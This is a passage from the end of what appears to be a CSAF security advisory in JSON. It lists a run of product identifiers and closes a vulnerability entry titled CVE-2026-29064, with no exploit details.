"CSAFPID-5910256",
"CSAFPID-5910257",
"CSAFPID-5910258",
"CSAFPID-5910259",
"CSAFPID-5910260",
"CSAFPID-5910261",
"CSAFPID-5910262",
"CSAFPID-5910263",
"CSAFPID-5910264",
"CSAFPID-5910265",
"CSAFPID-5910266",
"CSAFPID-5910267",
"CSAFPID-5910268",
"CSAFPID-5910269",
"CSAFPID-5910270",
"CSAFPID-5910271",
"CSAFPID-5910272",
"CSAFPID-5910273",
"CSAFPID-5910274",
"CSAFPID-5910275",
"CSAFPID-5910276",
"CSAFPID-5910277",
"CSAFPID-5910278"
]
}
],
"title": "CVE-2026-29064"
}
]
}